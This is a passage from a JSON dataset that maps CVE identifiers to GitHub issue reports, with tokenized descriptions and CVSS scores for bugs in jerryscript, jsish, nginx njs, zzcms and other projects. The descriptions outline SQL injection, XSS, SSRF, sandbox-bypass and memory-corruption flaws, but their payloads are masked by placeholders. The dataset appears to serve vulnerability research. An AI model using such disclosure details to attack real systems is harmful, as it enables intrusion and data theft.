    },
    {
        "CVE_ID": "CVE-2021-46343",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4921",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4921",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2022-01-04T06:02:03Z",
        "description": "Assertion 'context_p APITAG == LEXER_LITERAL' failed at PATHTAG APITAG APITAG revision Commit: a6ab5e9 URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG microsoft standard NUMBERTAG Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46344",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4928",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4928",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2022-01-04T06:07:34Z",
        "description": "Assertion 'flags & APITAG failed at PATHTAG APITAG APITAG revision Commit: a6ab5e9 URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG microsoft standard NUMBERTAG Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46345",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4920",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4920",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2022-01-04T06:01:01Z",
        "description": "Assertion 'cesu8_cursor_p == cesu8_end_p' failed at PATHTAG APITAG APITAG revision Commit: a6ab5e9 URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG microsoft standard NUMBERTAG Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46346",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4939",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4939",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2022-01-04T06:20:47Z",
        "description": "Assertion 'local_tza == APITAG (date_value)' failed at PATHTAG APITAG . APITAG revision Commit: a6ab5e9 URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG microsoft standard NUMBERTAG Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case APITAG FILETAG APITAG APITAG APITAG CODETAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46347",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4938",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4938",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2022-01-04T06:20:03Z",
        "description": "Assertion APITAG (obj_p)' failed at PATHTAG APITAG APITAG revision Commit: a6ab5e9 URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG microsoft standard NUMBERTAG Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case APITAG FILETAG APITAG APITAG APITAG CODETAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46348",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4941",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4941",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2022-01-04T06:22:36Z",
        "description": "Assertion APITAG (string_p)' failed at PATHTAG (ecma_free_string_list NUMBERTAG APITAG revision Commit: a6ab5e9 URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG microsoft standard NUMBERTAG Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG \u200b \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46349",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4937",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4937",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2022-01-04T06:19:15Z",
        "description": "Assertion 'type == ECMA_OBJECT_TYPE_GENERAL || type == ECMA_OBJECT_TYPE_PROXY' failed at PATHTAG APITAG APITAG revision Commit: a6ab5e9 URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG microsoft standard NUMBERTAG Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46350",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4936",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4936",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2022-01-04T06:18:34Z",
        "description": "Assertion 'ecma_is_value_object (value)' failed at PATHTAG APITAG APITAG revision Commit: a6ab5e9 URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG microsoft standard NUMBERTAG Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46351",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4940",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4940",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2022-01-04T06:21:48Z",
        "description": "Assertion 'local_tza == APITAG (date_value)' failed at PATHTAG APITAG APITAG revision Commit: a6ab5e9 URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG microsoft standard NUMBERTAG Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case APITAG FILETAG APITAG APITAG APITAG CODETAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46354",
        "Issue_Url_old": "https://github.com/cybelesoft/virtualui/issues/3",
        "Issue_Url_new": "https://github.com/cybelesoft/virtualui/issues/3",
        "Repo_new": "cybelesoft/virtualui",
        "Issue_Created_At": "2022-01-11T11:40:02Z",
        "description": "Vulnerability External Service Interaction. Dear Cybele Software, My name is Daniel Morales. I have found a vulnerability in Thinfinity APITAG that could allow a malicious actor to trigger a server side request to external endpoints. Summary External service interaction arises when it is possible to induce an application to interact with an arbitrary external service. The ability to send requests to other systems can allow the vulnerable server to filtrate the real IP of the webserver or increase the attack surface (it may be used also to filtrate the real IP behind a CDN) Payload An example of the HTTP request \" URLTAG APITAG APITAG APITAG APITAG where \" domain.com \" is the external endpoint to be requested. Vulnerable versions It has been tested in APITAG version NUMBERTAG and NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-46359",
        "Issue_Url_old": "https://github.com/FISCO-BCOS/FISCO-BCOS/issues/2124",
        "Issue_Url_new": "https://github.com/fisco-bcos/fisco-bcos/issues/2124",
        "Repo_new": "fisco-bcos/fisco-bcos",
        "Issue_Created_At": "2022-01-12T06:15:50Z",
        "description": "Transactions fail to be committed and the consensus process is stuck. Describe the bug I use the testing programs to send NUMBERTAG transactions to a group with NUMBERTAG nodes, it seems that over NUMBERTAG of the transactions cannot be committed successfully. APITAG To Reproduce Steps to reproduce the behavior NUMBERTAG Setup a group with NUMBERTAG nodes, each with a small size of tx pool NUMBERTAG Constantly sending txs to the group NUMBERTAG If the tx pool of the leader node is full, the consensus process will be stuck. Expected behavior All transactions should be commited successfully. Environment (please complete the following information): OS: Ubuntu NUMBERTAG FISCO BCOS release NUMBERTAG rc2",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-46371",
        "Issue_Url_old": "https://github.com/zuiidea/antd-admin/issues/1127",
        "Issue_Url_new": "https://github.com/zuiidea/antd-admin/issues/1127",
        "Repo_new": "zuiidea/antd-admin",
        "Issue_Created_At": "2022-01-13T01:50:22Z",
        "description": "Unauthorized access to some interfaces in the foreground was found. Procedure NUMBERTAG Unauthorized access to some interfaces in the foreground leads to leakage of sensitive information NUMBERTAG Install according to the official documents FILETAG NUMBERTAG Unauthorized access is found on some interfaces For example: PATHTAG the poc is : curl A APITAG APITAG NT NUMBERTAG Win NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG URLTAG NUMBERTAG At this time you can see some information back, such as the user ID, name, age, phone number, address and other sensitive information. FILETAG NUMBERTAG It can also be reproduced in the official sample site URLTAG the poc is : curl A APITAG APITAG NT NUMBERTAG Win NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG URLTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-46377",
        "Issue_Url_old": "https://github.com/cskaza/cszcms/issues/33",
        "Issue_Url_new": "https://github.com/cskaza/cszcms/issues/33",
        "Repo_new": "cskaza/cszcms",
        "Issue_Created_At": "2022-01-14T09:13:29Z",
        "description": "Bug Report: There is a front end boolean based sql injection vulnerability. Hi, I found a front end sql injection vulnerability in cszcms NUMBERTAG The vulnerable code is on APITAG The APITAG parameter here can be controlled by the user FILETAG And no filtering leads to sql injection vulnerability FILETAG First register a user in the foreground, then log in, then visit APITAG APITAG The content returned by the webpage is: FILETAG visit APITAG APITAG The content returned by the webpage is: FILETAG It's a Boolean based SQL injection Suggest: Add a filter function to this parameter",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-46433",
        "Issue_Url_old": "https://github.com/fenom-template/fenom/issues/331",
        "Issue_Url_new": "https://github.com/fenom-template/fenom/issues/331",
        "Repo_new": "fenom-template/fenom",
        "Issue_Created_At": "2022-01-19T04:45:25Z",
        "description": "Security Issue. Hi, In fenom NUMBERTAG and before ,there is a way to bypass sandbox to exec arbitrary php code when disable_native_funcs is true.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 10.0,
        "impactScore": 6.0,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-46434",
        "Issue_Url_old": "https://github.com/emqx/emqx/issues/6791",
        "Issue_Url_new": "https://github.com/emqx/emqx/issues/6791",
        "Repo_new": "emqx/emqx",
        "Issue_Created_At": "2022-01-19T07:01:59Z",
        "description": "Username Enumeration. APITAG APITAG APITAG Subject of the issue When a user login, the application returns different results depending on whether the account is correct that allowed an attacker to determine if a given username was valid. Your environment EMQ NUMBERTAG Steps to reproduce The problem lies in the \"/api NUMBERTAG auth\" interface If you log in using an existing account and the Password is incorrect, APITAG Error\" is displayed. FILETAG and APITAG Not Found\" is displayed when you log in using a non existent account. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-46436",
        "Issue_Url_old": "https://github.com/xunyang1/ZZCMS/issues/1",
        "Issue_Url_new": "https://github.com/xunyang1/zzcms/issues/1",
        "Repo_new": "xunyang1/zzcms",
        "Issue_Created_At": "2022-01-19T14:28:50Z",
        "description": "ZZCMS NUMBERTAG has a SQL injection vulnerability. ZZCMS NUMBERTAG sqlinject NUMBERTAG APITAG by rerce&rpsate ZZCMS the lastest version download page : FILETAG Environmental requirements PHP version NUMBERTAG Mysql version NUMBERTAG ulnerability code: in file FILETAG line NUMBERTAG FILETAG As shown in the picture above, parameter b is directly assigned to $b. FILETAG Then, $b is directly spliced into the SQL statement in line NUMBERTAG which leads to the SQL injection vulnerability. POC NUMBERTAG First log in to the administrator account NUMBERTAG isit URLTAG and intercept with burp NUMBERTAG You can see that the delay is NUMBERTAG s. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2021-46437",
        "Issue_Url_old": "https://github.com/xunyang1/ZZCMS/issues/2",
        "Issue_Url_new": "https://github.com/xunyang1/zzcms/issues/2",
        "Repo_new": "xunyang1/zzcms",
        "Issue_Created_At": "2022-01-19T15:30:55Z",
        "description": "ZZCMS NUMBERTAG has a xss vulnerability. ZZCMS NUMBERTAG SS NUMBERTAG APITAG by rerce&rpsate ZZCMS the lastest version download page : FILETAG Environmental requirements PHP version NUMBERTAG Mysql version NUMBERTAG ulnerability code: In the file APITAG line APITAG variable APITAG can be controlled by the APITAG ,then output on line NUMBERTAG and it not be filtered. FILETAG POC NUMBERTAG First log in to the administrator account NUMBERTAG isit ERRORTAG NUMBERTAG you will see a popup. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2021-46461",
        "Issue_Url_old": "https://github.com/nginx/njs/issues/450",
        "Issue_Url_new": "https://github.com/nginx/njs/issues/450",
        "Repo_new": "nginx/njs",
        "Issue_Created_At": "2021-12-24T06:33:59Z",
        "description": "illegal memcpy during njs_vmcode_typeof in PATHTAG Env CODETAG POC ERRORTAG Stack Dump ERRORTAG Credit P1umer, afang NUMBERTAG Kotori of APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-46462",
        "Issue_Url_old": "https://github.com/nginx/njs/issues/449",
        "Issue_Url_new": "https://github.com/nginx/njs/issues/449",
        "Repo_new": "nginx/njs",
        "Issue_Created_At": "2021-12-24T06:28:54Z",
        "description": "SEGV PATHTAG in njs_object_set_prototype. Env CODETAG POC ERRORTAG Stack Dump ERRORTAG Credit P1umer, afang NUMBERTAG Kotori of APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-46463",
        "Issue_Url_old": "https://github.com/nginx/njs/issues/447",
        "Issue_Url_new": "https://github.com/nginx/njs/issues/447",
        "Repo_new": "nginx/njs",
        "Issue_Created_At": "2021-12-20T05:07:22Z",
        "description": "Control flow hijack caused by Type Confusion of Promise object. Env CODETAG Poc ERRORTAG Analysis The output of the above poc is as follows: APITAG If I comment out APITAG ERRORTAG Then the output will be normal as follows: APITAG This is because APITAG has Type Confusion vuln when dealing with promise objects. The code APITAG will write the integer APITAG to APITAG field of data that has been confused as APITAG , although data may be of other types actually. CODETAG Therefore, when we try to change the data to the Symbol type: ERRORTAG The following error will be reported as expected: ERRORTAG We deliberately introduce the non writable APITAG to prove the validity of the vulnerability. Of course, this primitive can be used to confuse OTHER types of objects, and combined with heap spray technology to achieve control flow hijacking. Found by P1umer, Kotori, afang NUMBERTAG IIE Varas",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-46474",
        "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/57",
        "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/57",
        "Repo_new": "pcmacdon/jsish",
        "Issue_Created_At": "2021-12-24T09:47:27Z",
        "description": "Heap buffer overflow APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46475",
        "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/64",
        "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/64",
        "Repo_new": "pcmacdon/jsish",
        "Issue_Created_At": "2021-12-24T10:33:23Z",
        "description": "Heap buffer overflow APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46477",
        "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/63",
        "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/63",
        "Repo_new": "pcmacdon/jsish",
        "Issue_Created_At": "2021-12-24T10:32:32Z",
        "description": "Heap buffer overflow APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46478",
        "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/60",
        "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/60",
        "Repo_new": "pcmacdon/jsish",
        "Issue_Created_At": "2021-12-24T09:50:51Z",
        "description": "Heap buffer overflow APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case CODETAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46480",
        "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/61",
        "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/61",
        "Repo_new": "pcmacdon/jsish",
        "Issue_Created_At": "2021-12-24T10:30:42Z",
        "description": "Heap buffer overflow APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46481",
        "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/55",
        "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/55",
        "Repo_new": "pcmacdon/jsish",
        "Issue_Created_At": "2021-12-24T09:44:48Z",
        "description": "Memory leaks in linenoise APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case CODETAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46482",
        "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/66",
        "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/66",
        "Repo_new": "pcmacdon/jsish",
        "Issue_Created_At": "2021-12-24T10:35:07Z",
        "description": "Heap buffer overflow APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46483",
        "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/62",
        "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/62",
        "Repo_new": "pcmacdon/jsish",
        "Issue_Created_At": "2021-12-24T10:31:27Z",
        "description": "Heap buffer overflow APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46484",
        "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/73",
        "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/73",
        "Repo_new": "pcmacdon/jsish",
        "Issue_Created_At": "2021-12-24T10:41:10Z",
        "description": "Heap use after free APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case1 ERRORTAG Test case2 ERRORTAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46485",
        "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/70",
        "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/70",
        "Repo_new": "pcmacdon/jsish",
        "Issue_Created_At": "2021-12-24T10:38:22Z",
        "description": "SEGV APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46486",
        "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/65",
        "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/65",
        "Repo_new": "pcmacdon/jsish",
        "Issue_Created_At": "2021-12-24T10:34:07Z",
        "description": "SEGV APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case CODETAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46487",
        "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/72",
        "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/72",
        "Repo_new": "pcmacdon/jsish",
        "Issue_Created_At": "2021-12-24T10:39:45Z",
        "description": "SEGV ( PATHTAG ). Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46488",
        "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/68",
        "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/68",
        "Repo_new": "pcmacdon/jsish",
        "Issue_Created_At": "2021-12-24T10:36:54Z",
        "description": "SEGV APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46489",
